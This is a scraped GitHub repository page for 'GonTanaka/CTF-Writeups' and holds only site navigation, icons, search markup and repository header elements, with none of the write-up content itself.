<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="437949506" data-scoped-search-url="/GonTanaka/CTF-Writeups/search" data-owner-scoped-search-url="/users/GonTanaka/search" data-unscoped-search-url="/search" data-turbo="false" action="/GonTanaka/CTF-Writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="MK5F4MmuT81SS15Ek5/1144+Z4fyEERLiMzjYcWSjGG8w6/cccvgEVH3E/896YItI1BLgAckne2bs95dnfn2wA==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
<div class="d-flex flex-wrap flex-justify-end mb-3 px-3 px-md-4 px-lg-5" style="gap: 1rem;">
<div class="flex-auto min-width-0 width-fit mr-3"> <div class=" d-flex flex-wrap flex-items-center wb-break-word f3 text-normal"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo color-fg-muted mr-2"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <span> GonTanaka </span> <span>/</span> CTF-Writeups
<span></span><span>Public</span> </div>
</div>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-bell mr-2"> <path d="M8 16a2 2 0 0 0 1.985-1.75c.017-.137-.097-.25-.235-.25h-3.5c-.138 0-.252.113-.235.25A2 2 0 0 0 8 16ZM3 5a5 5 0 0 1 10 0v2.947c0 .05.015.098.042.139l1.703 2.555A1.519 1.519 0 0 1 13.482 13H2.518a1.516 1.516 0 0 1-1.263-2.36l1.703-2.554A.255.255 0 0 0 3 7.947Zm5-3.5A3.5 3.5 0 0 0 4.5 5v2.947c0 .346-.102.683-.294.97l-1.703 2.556a.017.017 0 0 0-.003.01l.001.006c0 .002.002.004.004.006l.006.004.007.001h10.964l.007-.001.006-.004.004-.006.001-.007a.017.017 0 0 0-.003-.01l-1.703-2.554a1.745 1.745 0 0 1-.294-.97V5A3.5 3.5 0 0 0 8 1.5Z"></path></svg>Notifications
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo-forked mr-2"> <path d="M5 5.372v.878c0 .414.336.75.75.75h4.5a.75.75 0 0 0 .75-.75v-.878a2.25 2.25 0 1 1 1.5 0v.878a2.25 2.25 0 0 1-2.25 2.25h-1.5v2.128a2.251 2.251 0 1 1-1.5 0V8.5h-1.5A2.25 2.25 0 0 1 3.5 6.25v-.878a2.25 2.25 0 1 1 1.5 0ZM5 3.25a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Zm6.75.75a.75.75 0 1 0 0-1.5.75.75 0 0 0 0 1.5Zm-3 8.75a.75.75 0 1 0-1.5 0 .75.75 0 0 0 1.5 0Z"></path></svg>Fork <span>0</span>
<div data-view-component="true" class="BtnGroup d-flex"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-star v-align-text-bottom d-inline-block mr-2"> <path d="M8 .25a.75.75 0 0 1 .673.418l1.882 3.815 4.21.612a.75.75 0 0 1 .416 1.279l-3.046 2.97.719 4.192a.751.751 0 0 1-1.088.791L8 12.347l-3.766 1.98a.75.75 0 0 1-1.088-.79l.72-4.194L.818 6.374a.75.75 0 0 1 .416-1.28l4.21-.611L7.327.668A.75.75 0 0 1 8 .25Zm0 2.445L6.615 5.5a.75.75 0 0 1-.564.41l-3.097.45 2.24 2.184a.75.75 0 0 1 .216.664l-.528 3.084 2.769-1.456a.75.75 0 0 1 .698 0l2.77 1.456-.53-3.084a.75.75 0 0 1 .216-.664l2.24-2.183-3.096-.45a.75.75 0 0 1-.564-.41L8 2.694Z"></path></svg><span> Star</span> <span>1</span> <button disabled="disabled" aria-label="You must be signed in to add this repository to a list" type="button" data-view-component="true" class="btn-sm btn BtnGroup-item px-2"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-triangle-down"> <path d="m4.427 7.427 3.396 3.396a.25.25 0 0 0 .354 0l3.396-3.396A.25.25 0 0 0 11.396 7H4.604a.25.25 0 0 0-.177.427Z"></path></svg></button></div>
</div>
<div id="responsive-meta-container" data-turbo-replace></div>
<nav data-pjax="#js-repo-pjax-container" aria-label="Repository" data-view-component="true" class="js-repo-nav js-sidenav-container-pjax js-responsive-underlinenav overflow-hidden UnderlineNav px-3 px-md-4 px-lg-5">
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-code UnderlineNav-octicon d-none d-sm-inline"> <path d="m11.28 3.22 4.25 4.25a.75.75 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.275-.326.749.749 0 0 1 .215-.734L13.94 8l-3.72-3.72a.749.749 0 0 1 .326-1.275.749.749 0 0 1 .734.215Zm-6.56 0a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042L2.06 8l3.72 3.72a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L.47 8.53a.75.75 0 0 1 0-1.06Z"></path></svg> <span>Code</span> <span></span>
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-issue-opened UnderlineNav-octicon d-none d-sm-inline"> <path d="M8 9.5a1.5 1.5 0 1 0 0-3 1.5 1.5 0 0 0 0 3Z"></path><path d="M8 0a8 8 0 1 1 0 16A8 8 0 0 1 8 0ZM1.5 8a6.5 6.5 0 1 0 13 0 6.5 6.5 0 0 0-13 0Z"></path></svg> <span>Issues</span> <span>0</span>
